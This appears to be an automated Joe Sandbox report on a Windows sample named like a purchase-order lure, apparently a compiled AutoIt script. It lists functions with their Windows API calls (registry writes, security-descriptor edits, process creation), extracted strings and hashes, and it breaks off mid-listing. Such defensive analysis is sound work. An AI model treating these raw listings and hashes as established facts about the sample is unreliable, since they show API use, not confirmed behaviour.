              • Opcode Fuzzy Hash: 5986a6d0e4554e47bddbd7016eb8a436791aa0a497a715597635d97c693645bf
              • Instruction Fuzzy Hash: 3BE19C312086129FDB14DF24E55486EBBE6BFC8314F14895DF896AB3A2DB30ED46CB41
              APIs
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005A8968
              • GetSystemMetrics.USER32(00000007), ref: 005A8970
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005A899B
              • GetSystemMetrics.USER32(00000008), ref: 005A89A3
              • GetSystemMetrics.USER32(00000004), ref: 005A89C8
              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005A89E5
              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005A89F5
              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005A8A28
              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005A8A3C
              • GetClientRect.USER32(00000000,000000FF), ref: 005A8A5A
              • GetStockObject.GDI32(00000011), ref: 005A8A76
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 005A8A81
                • Part of subcall function 005A912D: GetCursorPos.USER32(?), ref: 005A9141
                • Part of subcall function 005A912D: ScreenToClient.USER32(00000000,?), ref: 005A915E
                • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000001), ref: 005A9183
                • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000002), ref: 005A919D
              • SetTimer.USER32(00000000,00000000,00000028,005A90FC), ref: 005A8AA8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
              • String ID: AutoIt v3 GUI
              • API String ID: 1458621304-248962490
              • Opcode ID: 1e358c90a473c7d783b78e0a534d42a32c3307be30309d3efac07892e39716ba
              • Instruction ID: f3afa1aa87ab527282bbea4d446022e0b505cb268354058b50ae4f33bffe86d0
              • Opcode Fuzzy Hash: 1e358c90a473c7d783b78e0a534d42a32c3307be30309d3efac07892e39716ba
              • Instruction Fuzzy Hash: 53B15D71A0020A9FDB14DFA8CC49BAE3BB6FB49354F144229FA15EB290DB74E851CB51
              APIs
                • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                • Part of subcall function 005F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                • Part of subcall function 005F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                • Part of subcall function 005F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005F0DF5
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005F0E29
              • GetLengthSid.ADVAPI32(?), ref: 005F0E40
              • GetAce.ADVAPI32(?,00000000,?), ref: 005F0E7A
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005F0E96
              • GetLengthSid.ADVAPI32(?), ref: 005F0EAD
              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 005F0EB5
              • HeapAlloc.KERNEL32(00000000), ref: 005F0EBC
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005F0EDD
              • CopySid.ADVAPI32(00000000), ref: 005F0EE4
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005F0F13
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005F0F35
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005F0F47
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F6E
              • HeapFree.KERNEL32(00000000), ref: 005F0F75
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F7E
              • HeapFree.KERNEL32(00000000), ref: 005F0F85
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F8E
              • HeapFree.KERNEL32(00000000), ref: 005F0F95
              • GetProcessHeap.KERNEL32(00000000,?), ref: 005F0FA1
              • HeapFree.KERNEL32(00000000), ref: 005F0FA8
                • Part of subcall function 005F1193: GetProcessHeap.KERNEL32(00000008,005F0BB1,?,00000000,?,005F0BB1,?), ref: 005F11A1
                • Part of subcall function 005F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,005F0BB1,?), ref: 005F11A8
                • Part of subcall function 005F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005F0BB1,?), ref: 005F11B7
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
              • String ID:
              • API String ID: 4175595110-0
              • Opcode ID: 1b45ad112029b764290fbb4710e5bac9a3823a38104dd231babef8b953343ba2
              • Instruction ID: 034d50e98f4c10d9a9e5f21b8de67feeafee9b666ff04490e6046d8e464ab63f
              • Opcode Fuzzy Hash: 1b45ad112029b764290fbb4710e5bac9a3823a38104dd231babef8b953343ba2
              • Instruction Fuzzy Hash: 29715C7290060AEBDF209FA4DC49FBEBBB9BF04310F185115FA19E6192D7359A16CB60
              APIs
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C4BD
              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0062CC08,00000000,?,00000000,?,?), ref: 0061C544
              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0061C5A4
              • _wcslen.LIBCMT ref: 0061C5F4
              • _wcslen.LIBCMT ref: 0061C66F
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0061C6B2
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0061C7C1
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0061C84D
              • RegCloseKey.ADVAPI32(?), ref: 0061C881
              • RegCloseKey.ADVAPI32(00000000), ref: 0061C88E
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0061C960
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
              • API String ID: 9721498-966354055
              • Opcode ID: 35f7be1464d9ad4791f82ae2bcbc0d95da656236f38cd82760cbb9ac0073ab0b
              • Instruction ID: 7fe58bf80a590e68760c5a2bc4dd5b0d95fcdaa6d9d294eebc42bd35e6809dce
              • Opcode Fuzzy Hash: 35f7be1464d9ad4791f82ae2bcbc0d95da656236f38cd82760cbb9ac0073ab0b
              • Instruction Fuzzy Hash: 2D125D356042019FDB14DF14C895A6EBBE6FF88724F19885DF84A9B3A2DB31ED41CB81
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 006209C6
              • _wcslen.LIBCMT ref: 00620A01
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00620A54
              • _wcslen.LIBCMT ref: 00620A8A
              • _wcslen.LIBCMT ref: 00620B06
              • _wcslen.LIBCMT ref: 00620B81
                • Part of subcall function 005AF9F2: _wcslen.LIBCMT ref: 005AF9FD
                • Part of subcall function 005F2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005F2BFA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$MessageSend$BuffCharUpper
              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
              • API String ID: 1103490817-4258414348
              • Opcode ID: aec8a8a4aa198a594c6ea4516fbc55269004357309bb28bf0ae97426784e756c
              • Instruction ID: a9248b1ca63fe63a73dd8828ee9ce65f3013f176ce27fadae02bf15e4d653cfd
              • Opcode Fuzzy Hash: aec8a8a4aa198a594c6ea4516fbc55269004357309bb28bf0ae97426784e756c
              • Instruction Fuzzy Hash: 42E19931208B129FCB14DF24D45096ABBE2BFD8314F51895DF8969B3A2D731ED4ACB81
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
              • API String ID: 1256254125-909552448
              • Opcode ID: 77435cb24420ad5b894f57c3fe7fc8f80d709edbaf2a0184b64706f5ccea65ab
              • Instruction ID: 7791123dbfac706ef6becd0ae66e8e51abf821fbeb189bf2e6166b32a24e50cc
              • Opcode Fuzzy Hash: 77435cb24420ad5b894f57c3fe7fc8f80d709edbaf2a0184b64706f5ccea65ab
              • Instruction Fuzzy Hash: 0871DF3268412A8BCB20DE7CD9515FE37A3AFA1760F290128EC6697384E631DDC5C3A0
              APIs
              • _wcslen.LIBCMT ref: 0062835A
              • _wcslen.LIBCMT ref: 0062836E
              • _wcslen.LIBCMT ref: 00628391
              • _wcslen.LIBCMT ref: 006283B4
              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006283F2
              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00625BF2), ref: 0062844E
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628487
              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006284CA
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628501
              • FreeLibrary.KERNEL32(?), ref: 0062850D
              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0062851D
              • DestroyIcon.USER32(?,?,?,?,?,00625BF2), ref: 0062852C
              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00628549
              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00628555
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
              • String ID: .dll$.exe$.icl
              • API String ID: 799131459-1154884017
              • Opcode ID: 01fa9fa990da13ad581adea3f066ae278f33a88c3cc6aaf35eb4a5b6d0fcafa4
              • Instruction ID: a14b23ca4746800f289dad6fd222f2f68616a0456d0bc49820b84d7366f84dab
              • Opcode Fuzzy Hash: 01fa9fa990da13ad581adea3f066ae278f33a88c3cc6aaf35eb4a5b6d0fcafa4
              • Instruction Fuzzy Hash: 3761ED71500A26BFEB24DF64DC45BFE7BA9BF48B21F104109F815E61D1DB74AA90CBA0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
              • API String ID: 0-1645009161
              • Opcode ID: f7d593f92cf702f85cb1280e1ec30c086847c8557e5519f6ae604517be2e7f49
              • Instruction ID: 6e240656d2e2837c3982e56d7637bdf29f0d2c13acb48504fc038db43e0741a9
              • Opcode Fuzzy Hash: f7d593f92cf702f85cb1280e1ec30c086847c8557e5519f6ae604517be2e7f49
              • Instruction Fuzzy Hash: CF81097161060ABBDF20AFA4DC46FBE3FA9FF59300F044426F904AA292EB70D915C791
              APIs
              • LoadIconW.USER32(00000063), ref: 005F5A2E
              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005F5A40
              • SetWindowTextW.USER32(?,?), ref: 005F5A57
              • GetDlgItem.USER32(?,000003EA), ref: 005F5A6C
              • SetWindowTextW.USER32(00000000,?), ref: 005F5A72
              • GetDlgItem.USER32(?,000003E9), ref: 005F5A82
              • SetWindowTextW.USER32(00000000,?), ref: 005F5A88
              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005F5AA9
              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005F5AC3
              • GetWindowRect.USER32(?,?), ref: 005F5ACC
              • _wcslen.LIBCMT ref: 005F5B33
              • SetWindowTextW.USER32(?,?), ref: 005F5B6F
              • GetDesktopWindow.USER32 ref: 005F5B75
              • GetWindowRect.USER32(00000000), ref: 005F5B7C
              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 005F5BD3
              • GetClientRect.USER32(?,?), ref: 005F5BE0
              • PostMessageW.USER32(?,00000005,00000000,?), ref: 005F5C05
              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005F5C2F
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
              • String ID:
              • API String ID: 895679908-0
              • Opcode ID: b6ec4e89e305fbffc5830e227d5f8c677d15f71d31e92d18c308d3053cf242bc
              • Instruction ID: 97a5b35eabd2fbaec5fb0b635edacc57c8d3f9235be52d5ecd61710ac3d9e1f9
              • Opcode Fuzzy Hash: b6ec4e89e305fbffc5830e227d5f8c677d15f71d31e92d18c308d3053cf242bc
              • Instruction Fuzzy Hash: 42715031900B09AFDB20DFA8CE49A7EBBF5FF48715F104918E682A35A0E775E945CB50
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[e
              • API String ID: 176396367-3722887849
              • Opcode ID: 1ec91a135d1d39aa4b2ead660fbd0e36abc75449818b95dd62a0e6e5ecb86992
              • Instruction ID: 0ffe8aea335eafb6d230b27e878ae7b16ab4bf0418327d92032eb0d93ecbf4c7
              • Opcode Fuzzy Hash: 1ec91a135d1d39aa4b2ead660fbd0e36abc75449818b95dd62a0e6e5ecb86992
              • Instruction Fuzzy Hash: 17E10831A0051AABEF14DFB4C4596FEFFB1BF84710F148519E656A7240DB34AE89C790
              APIs
              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005B00C6
                • Part of subcall function 005B00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0066070C,00000FA0,220885C7,?,?,?,?,005D23B3,000000FF), ref: 005B011C
                • Part of subcall function 005B00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005D23B3,000000FF), ref: 005B0127
                • Part of subcall function 005B00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005D23B3,000000FF), ref: 005B0138
                • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005B014E
                • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005B015C
                • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005B016A
                • Part of subcall function 005B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B0195
                • Part of subcall function 005B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B01A0
              • ___scrt_fastfail.LIBCMT ref: 005B00E7
                • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
              Strings
              • InitializeConditionVariable, xrefs: 005B0148
              • SleepConditionVariableCS, xrefs: 005B0154
              • WakeAllConditionVariable, xrefs: 005B0162
              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005B0122
              • kernel32.dll, xrefs: 005B0133
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
              • API String ID: 66158676-1714406822
              • Opcode ID: d27074b44a879c07d6560d52f06a6fa6431b5df56e4cb282035ff0417104fe15
              • Instruction ID: 7d1c12631a300f9f429dac8f17bf761d8348e879ec1a4ac326d12294006619d8
              • Opcode Fuzzy Hash: d27074b44a879c07d6560d52f06a6fa6431b5df56e4cb282035ff0417104fe15
              • Instruction Fuzzy Hash: AF21CC32644F116BE7245BA8AC0EBAF7FA6FF45B61F011535F801A62D1DB74AC00CA90
              APIs
              • CharLowerBuffW.USER32(00000000,00000000,0062CC08), ref: 00604527
              • _wcslen.LIBCMT ref: 0060453B
              • _wcslen.LIBCMT ref: 00604599
              • _wcslen.LIBCMT ref: 006045F4
              • _wcslen.LIBCMT ref: 0060463F
              • _wcslen.LIBCMT ref: 006046A7
                • Part of subcall function 005AF9F2: _wcslen.LIBCMT ref: 005AF9FD
              • GetDriveTypeW.KERNEL32(?,00656BF0,00000061), ref: 00604743
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$BuffCharDriveLowerType
              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
              • API String ID: 2055661098-1000479233
              • Opcode ID: f94c8022bc924f63344ee06a3dc2d5580fc2d085f78bee9f761949ff541023a5
              • Instruction ID: 8edf4d9fa6a5fc277ebf06214f5d70592fff7198f251090457d53b5fd878cb25
              • Opcode Fuzzy Hash: f94c8022bc924f63344ee06a3dc2d5580fc2d085f78bee9f761949ff541023a5
              • Instruction Fuzzy Hash: D7B1F3B15483029BC728DF28C890AABBBE6BFE5710F50491DF69687291EB31D845CB52
              APIs
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
              • DragQueryPoint.SHELL32(?,?), ref: 00629147
                • Part of subcall function 00627674: ClientToScreen.USER32(?,?), ref: 0062769A
                • Part of subcall function 00627674: GetWindowRect.USER32(?,?), ref: 00627710
                • Part of subcall function 00627674: PtInRect.USER32(?,?,00628B89), ref: 00627720
              • SendMessageW.USER32(?,000000B0,?,?), ref: 006291B0
              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006291BB
              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006291DE
              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00629225
              • SendMessageW.USER32(?,000000B0,?,?), ref: 0062923E
              • SendMessageW.USER32(?,000000B1,?,?), ref: 00629255
              • SendMessageW.USER32(?,000000B1,?,?), ref: 00629277
              • DragFinish.SHELL32(?), ref: 0062927E
              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00629371
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#f
              • API String ID: 221274066-3566790704
              • Opcode ID: ca94742f14b082d15f0baba7c90518b749ce206812f6ec6d0b61f1dc7d0ca022
              • Instruction ID: 1f585d886b538417e8591c401182b7d8cc868352a3e883690c822b0fa2a22fe6
              • Opcode Fuzzy Hash: ca94742f14b082d15f0baba7c90518b749ce206812f6ec6d0b61f1dc7d0ca022
              • Instruction Fuzzy Hash: 89613771108701AFC701EF54DC89DAFBBEAFBC9750F00092EB595961A1DB709A49CBA2
              APIs
              • _wcslen.LIBCMT ref: 0061B198
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0061B1B0
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0061B1D4
              • _wcslen.LIBCMT ref: 0061B200
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0061B214
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0061B236
              • _wcslen.LIBCMT ref: 0061B332
                • Part of subcall function 006005A7: GetStdHandle.KERNEL32(000000F6), ref: 006005C6
              • _wcslen.LIBCMT ref: 0061B34B
              • _wcslen.LIBCMT ref: 0061B366
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0061B3B6
              • GetLastError.KERNEL32(00000000), ref: 0061B407
              • CloseHandle.KERNEL32(?), ref: 0061B439
              • CloseHandle.KERNEL32(00000000), ref: 0061B44A
              • CloseHandle.KERNEL32(00000000), ref: 0061B45C
              • CloseHandle.KERNEL32(00000000), ref: 0061B46E
              • CloseHandle.KERNEL32(?), ref: 0061B4E3
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
